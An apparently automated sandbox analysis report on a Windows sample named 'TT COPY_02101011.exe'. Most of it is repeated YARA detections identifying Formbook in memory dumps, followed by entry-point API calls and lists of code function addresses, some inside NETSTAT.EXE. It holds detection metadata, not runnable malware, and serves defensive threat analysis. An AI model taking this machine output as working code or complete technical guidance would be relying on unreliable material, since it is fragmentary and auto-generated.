Source: Yara match	File source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: TT COPY_02101011.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Code function: 0_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_004030E3

Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_00406043	0_2_00406043
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_00404618	0_2_00404618
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_0040681A	0_2_0040681A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_1000C41B	0_2_1000C41B
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_10015A51	0_2_10015A51
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_10014272	0_2_10014272
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_10013D00	0_2_10013D00
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_1000C90F	0_2_1000C90F
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_1000CD27	0_2_1000CD27
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_1000D15C	0_2_1000D15C
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_1000F16D	0_2_1000F16D
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_1001696C	0_2_1001696C
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_1000D591	0_2_1000D591
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_100147E4	0_2_100147E4
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00401026	1_2_00401026
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_0041D0EE	1_2_0041D0EE
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_0041C154	1_2_0041C154
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00401174	1_2_00401174
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00408C90	1_2_00408C90
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00402D88	1_2_00402D88
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC20A0	1_2_00AC20A0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B620A8	1_2_00B620A8
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AAB090	1_2_00AAB090
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B628EC	1_2_00B628EC
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51002	1_2_00B51002
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AB4120	1_2_00AB4120
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A9F900	1_2_00A9F900
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B622AE	1_2_00B622AE
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ACEBB0	1_2_00ACEBB0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B5DBD2	1_2_00B5DBD2
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B62B28	1_2_00B62B28
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA841F	1_2_00AA841F
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B5D466	1_2_00B5D466
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC2581	1_2_00AC2581
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AAD5E0	1_2_00AAD5E0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B625DD	1_2_00B625DD
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A90D20	1_2_00A90D20
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B62D07	1_2_00B62D07
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B61D55	1_2_00B61D55
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B62EF7	1_2_00B62EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E2B28	9_2_032E2B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324EBB0	9_2_0324EBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D03DA	9_2_032D03DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032DDBD2	9_2_032DDBD2
